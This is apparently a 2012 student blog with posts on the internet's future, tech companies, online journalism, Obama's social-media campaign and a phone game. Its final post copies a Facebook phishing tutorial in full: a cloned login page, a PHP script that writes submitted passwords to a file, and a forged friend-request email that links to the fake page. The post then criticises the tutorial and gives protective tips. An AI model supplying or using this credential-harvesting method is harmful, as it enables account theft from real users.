Tuesday 17 April 2012

The Future of Internet in 2020

Currently the internet is 26 years, 11 months , 3 weeks, 6 days, 16 hours and 2 minutes years old. Technology has evolved so much in such little time.  Now we not only shop, work and meet people online but we also publicize what we are doing at a particular moment through social networking sites like Facebook and Twitter. All of us are well aware that 2020 holds a lot of surprises. If in 2012 we could see technological products such as Google Glasses, iPad, iPhone4s, etc. What 2020 could offer is beyond our imagination. Companies and Individuals will be more transparent in terms of their personal information  which will consequently question their personal integrity and social tolerance. The mobile would act as a connection tool to the Internet in the world in 2020.The internet's capabilities and capacity for creating and cultivating communication social relationships is on a very grand scale and is undeniably interactive. Things such as voice recognition and touch user interface which prevails to some extent in 2012 will be the norm of 2020. There will be constant and a more emphasized solution in allowing copyright protection to prevent people finding various ways to copy information without payment. Virtual reality and the Physical world will not have a barrier  mixing social relations. 

The polarization and extremity of an individual's personality will be reflected in the technology that develops in  2020. The world will be less tolerant since one's surroundings will not have the uniformity of a single culture. 

In today's day and age no business can operate globally without a website. Companies and Enterprises have used the Internet to change the way they do business and enjoy the opportunities made while using the Internet as a tool of connecting with people today. The Internet today provides connectivity but it is not omnipresent, we have bandwidth but it is not limitless, we have access to content but it cant be reused in every device. Security is such at a question right now. 


In an Asian Media Conference in Los Angeles in 1998  , Lee Kuan Yew, Singapore’s Senior Minister said “Singapore has managed this relentless flood of information not by blocking the flow but by stating its point of view in competition."Singapore probably has the greatest concentration of international media in the region”. (Straits Times, Oct 31 & Nov 2, 1998). In contrast to this description of Singapore’s fresh freedom is a double voice which speaks volume of the unresolved tension and the history of the supressing of the media in Singapore and how information is slightly more controlled . The mass media theory is the idea that media are corrupting impacts that weaken the social order. This shows the existence of a mass media society where through the power of the state the government can monopolize the public and control their thoughts.

This political view in term of Singapore also shows how in the Future, the Internet will be filled with networked connections. The government will have a lesser impact in controlling thoughts as there will be more room for thoughts in the mind of the citizens. There will be new ways of working, new ways of interacting , new ways of living, etc. As mentioned in my previous blog post companies such as Apple, Google, and Amazon will develop more in the future only if these companies aim and hold on to diverse business units and integrate themselves with various technological devices to create a more intense realm of the future/ 

Monday 16 April 2012

Case Study on Google Vs Amazon Vs Apple

The question arises who is the King out of these three wonderful tech companies which would be given the title of " The King" and Number1. Earlier Amazon just focused on selling books, Google was a search engine ,and Apple sold computers. In the recent years this has not been the scenario. Google and Apple now sell phones, Apple focuses on music, Amazon has indulged in server business and Amazon gives online payment services. Each one of these companies has been trying to be diverse in their own ways. This is just the beginning of the end.

To some people Amazon might be a clear choice due to its strong online medium and its distribution centers across US. Why couldn't it be Apple? It surely can... Apple has a first hand success when it comes to the iPad and the iPhone. It has brought technology to another level altogether. It has a successful retain strategy and one of the most important aspect of a company would be its leader. Steve Jobs, has a well known name and is a LEGEND! Apart from this reason Apple has constantly proved itself to be worthy due to the constant competition it has been giving. Apart from this Google on the other hand could also be a viable option as it is a source for knowledge which is constantly required in business, education and personal activities.

All these companies are well established and are well grounded with strong leaders and leadership. The question is in the near future which one of these companies will diversify and integrate themselves. Amazon has attracted its audience by various inventions such as Kindle and Kindle fire that have changed the way people read books. Google is filled with zest, information transportation, financial services. Apple focuses more on devices, technology and entertainment.

Case Study of Amazon Vs Apple Competing Ecosystem Strategies : The Case study talks about how the invention of  great products are necessary but not as important as developing new solutions. For example when Apple expanded from music players to phones, it indulged in the iPhone not just technology and software of the iPod but also the user's music store entire supplier base. By transferring elements and components of the iPod , apple give birth to the iPhone.

Amazon had used the same tactic like Apple. When the Kindle Fire was introduced last year, it brings together e-book activities with users e-book libraries. The original Kindle in 2007 was just meant for reading whereas Kindle Fire has boomed the tablet market and allows users to watch videos, read and run some Android applications. However the difference between Apple and Amazon is in terms of its " footprint" and " profit model". Apple receives a huge bulk of profit the moment an iPad is sold, while its partners receive value over time as users consume the services. In contrast Amazon's receives its profit gradually over the lifetime of the customer.Amazon together with its partners makes profit over time. (http://blogs.hbr.org/cs/2012/03/amazon_vs_apple_competing_ecos.html)

The conclusion to this would be that the question of being Number ONE depends more on what fields do these companies will be focusing on and using in the future. It is expected that these three companies would be aiming and holding on to diverse business units. So far the question of being Number one still remains. The race is very competitive with all three contenders doing its best to strive to the top

Tuesday 10 April 2012


This is the video made by me. It's a video about all the memories I have made in Singapore. Since i am an international student, all the times i have spent here and the  friends I have made are very special, since i might not meet these people again. Thus the video, so I have something to look back to as I move ahead with time

Friday 30 March 2012

Does Journalism have a future on the Internet?

The Internet as we know has the capability of reaching to a wide audience all around the world. It is a valuable tool and lives up to the quote "Knowledge is power" due to the vast availability of knowledge and information present on the Internet. However, when the question arises if the internet is useful in the field of journalism, most of us would presume the answer to be YES which is not entirely true; the internet does have its disadvantages in the field of journalism.

To begin with its advantages. The Internet in the field of journalism further enhances the concept of global village allowing benefits for various factors such as : 

  • Cost reduction-Readers can save money by reading news online, instead of subscribing for newspapers
  • Easy and Convenient accessibility- consumers can get news from any source possible, expanding and increasing knowledge 
  • Introduction to new tools- Skype interviews, online databases. More convenient for reporters 
  • Maintains balance of power- This is maintained between users and journalists, where users are free to view whatever content possible and journalists are able to put up any content possible, supported by evidence. Neither one of the two- users and journalist function as a gatekeeper.                                   
In contrast to this , in a 2012 poll that  had been conducted by The Atlantic and National Journal,  43 media insiders (Media insiders include people who work as editors, reporters and publishers) were asked if journalism has been helped more or hurt more by the rise of news consumption online. 65% said journalism had been hurt more, while 34 percent said it had helped more.

As seen in my previous blog post about President Obama’s use of the Internet to connect and reach out to his audiences. Mr. Obama had recorded his speeches and had used the Internet; specifically YouTube to post his speeches .This is an example of journalism on the Internet. The media insiders were also asked about the coverage of President Obama. Out of 45 respondents, 71 percent said it was “about right”, 22 percent said it’s been “too easy” and 7 percent said it’s been “too tough”. This shows how the media insiders considered President Obama's use of Internet for journalism too "overexposed". As the majority had said, the use of the Internet was " about right" , it was how they had expected it to be- superficial. 

The following video above further accentuates on how the Internet was best described as " overexposed" and " superficial " in the field of journalism. 

The increase in audience reach using the Internet  is indeed gratifying but the use of internet to promote journalism has distorted the need of meeting up to the challenges of  independent reporting and newsgathering which are aspects of traditional journalism. The rise in the internet has reduced the traditional media industry causing a downfall in the business and economic model of print based journalism. It has also questioned the online content of information which does not share the same par or substantial worth as the content provided by print based media like newspapers.The rise in the Internet has also effected the journalism profession in a negative way, there is a great number in the loss of journalism jobs and a decline in revenue 

 The answer to the title of the blog post would be: Both-   It has a terrifying and a bright future. 


Sunday 25 March 2012

Politics on the Internet- Two great forces

Politicians are evolving their methods to reach out to their masses via the Internet. The 2008 U.S. presidential campaign depicted Obama's campaign's use of Facebook,You Tube and Twitter which had helped his victory. The election of Barack Obama as president was in parallel to John Kennedy's election in which Kennedy's has used television that forever changed politics. For Mr. Obama, it was the Internet. One of the unique features of The Obama campaign was the use of social networking sites like My Space and Facebook. Facebook is more popular among kids these days and thus alot of college students had joined Obama's Facebook site increasing his popularity among the young people. He has over 1.5 million friends on My Space and Facebook, and he currently has over 45,000 followers on Twitter.  

It is no longer a one way system where the government hands down the laws to citizens, why not use the Internet to let citizens and organisations  work together with government officials to find solutions to problem accentuating on a peer- to- peer network. 

Mr Obama had also used YouTube as a medium to connect and reach out to his audiences. Most of his speeches are recorded and posted it on YouTube to create a larger community of supporters, communicate with his followers and make his campaign and the political process more transparent

Apart from using the existing social media, Obama's campaign had also launched its own web page entitled MyBarackObama.com ( http://www.barackobama.com/)  and online action groups to fight against false rumours about Obama's personal background and tax policies. Two million profiles were created on Obama's own social network with 200,000 offline events planned where campaign donors can have dinner with Obama , 400,000 blog posts and more than 35,000 volunteer groups were created 

Mr Obama had a balanced approach towards his campaign. He not only used social media as means of reaching out to his audience but  had also used the traditional face to face approach. The campaign was filled with creativity and enthusiasm which manifested through the YouTube videos, Facebook page and even organizing events outside the barriers of social media such as dinners with the public to get to know their perceptions. 


Monday 19 March 2012

'Draw Something': The new multimedia addiction

The use of multimedia is becoming more diverse. The multimedia capabilities of mobile phone will continue to evolve. Currently mobile phones have been viewed as diverse functions that will take over  many traditional electronic devices such as camera, music player, game boy, etc. The iPhone4s and Android are examples of top multimedia phones.  Focusing on the iPhone, it is integrated with iTunes which lets you download content such as podcasts directly to the device. The You Tube application allows you to watch videos online by streaming them on to the iPhone. The iPhone is classified as a " multimedia smartphone" manufactured by Apple Inc. The smartphone can function as a camera, visual voice mail, media player, and text messaging. It could be used to access our email accounts and web browsers. Navigation through the iPhone, just like the iPad can be enhanced through multi-touch screen. Applications such as social networking sites, games, GPS navigation , etc can be installed in the phone. Multimedia combines all the elements such as text , video, sound, graphics and animation into a powerful tool – in this case, specifically the iPhone to enhance creativity, entertainment and learning environment. 

Smart phones have become more sophisticated due to their operating systems, various programs and utility. Operating system is a platform in the phone which the user could add any application and program. The user could set in applications like games, multimedia application, and e-books. The current iPhone 4s has the world's largest collection of mobile applications, twitter integration, etc. 

From board games ,  now cell phones have a wide variety of games. iPhone for instance  has also been gaining popularity for games such as Angry Birds and the recent most popular game on iPhone and Android- 'Draw Something'.

'Draw Something' is very addictive and I can say this for a fact that this is true as I have started playing this game and I have become so addicted to it. The game is something like Pictionary. One can even register within the game through Facebook or Twitter. 

The following video explains how the game works.  

The game is interactive, it brings friends together and it would be a great way for students to work on their artistic skills. Imagine an art assignment to draw 10 things on Draw Something and then bring in screen shots to show what you drew.

Multimedia is a broad term to show how media is used in a variety of ways to display content . Mobile phones as we know is very effective, however their small screen size limits the ability to share visual images. Apple Inc has evolved and has improved their forms of multimedia from iPod, iPhone and to iPad. 


Sunday 18 March 2012

Facebook Phishing

Recently I came across an article entitled” How to Hack Facebook Account using phishing web page?” This article took me by surprise, I never thought that such articles would be posted for the public to see and to follow such practices. Before I proceed explaining the step by step process of hacking into the Facebook account by phishing the web page, I would like to explain what phishing is. Phishing a  webpage is creating a webpage which looks like the original website. By creating a Phishing WebPage, one can make users believe that it is the original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".

Copy the code to Notepad. 

Step 2: 
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this: 
As seen in the picture above one has to change the circled word "action" to "next.php" '. After you have done that, you should change the method  to "get" instead of "post", or else it will not work. Save the document as index.htm

Step 3:
Now we need to create the "next.php" to store the password. To do this,open the notepad and type the following code:
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");


Step 4: 
Open the notepad and save the file as " pswrds.txt" without any contents. 
Then upload those three files- (index.html, next.php, pswrds.txt) in any subdomain Web hosting site. The web hosting service should have the php feature. One can choose any of these sites :110mb.com, spam.com justfree.com or 007sites.com. 

Step 5: 
Create a Facebook account with keywords like facebook@hotmail.com, facebook_welcome@hotmail.com 

Step 6: 
Copy the original Facebook invitation and paste it in your mail
Remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
 For this step basically when someone adds you as a friend on Facebook, just copy that mail and paste in compose mail. In that , one will be able to find this link 
http:/www.facebook.com/n/?reqs.php .  Just delete the link from this but mark it and create link with same text but link to your site.   

"Add the hyperlink button in the red circle and your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php but this leads to your phisher page. (http://www.breakthesecurity.com/2010/11/how-to-hack-facebook-account-using.html

The title of the page reads" Ethical Hacking Tutorials". Is this considered ethical? The Internet as a media is shaping the values and outlooks of children. The vast array of information has become a source of trouble for children. The knowledge acquired is marvelous and unique, however it has to be used in the right way by people.  The Internet also serves as a positive learning and teaching tool. It provides ways to prevent and protect from Facebook Phishing attack : 

1) " Follow the Sophos Blog" -  They are reports on the latest Facebook phishing scams in a blog called Naked security. The blog is one of the best sources today when it comes to Facebook scams. There are stories and articles raising awareness to the public about the different experiences and happenings of Facebook phishing scams

 2)  BitDefender Safe Go- Safe Go is a Facebook application developed by BitDefender which is designed to keep users aware and protected from scams on Facebook. SafeGo scans the user's profile for suspicious links and also has an option to automatically post  on one's wall when a threat is detected.

3) Facebook Security- Another way of being safe on Facebook comes directly from the source itself  - " Facebook Security Page". The Facebook Security Page is constantly being updated to protect the user's account.

4) Look for the Signs- Aside from all the technical ways one can protect their Facebook account is by being more alert. See who has posted on your wall and why would they share something beginning with " OMG  you wont believe this!"  If you receive emails that claim to be from Facebook, make sure to analyse and evaluate the email address they came from. Facebook notifications always come from Facebookmail.com. If you feel that your Facebook account has been phished, the first thing to do is change your password. You can even change your privacy settings on Facebook to make sure your account is safe. 
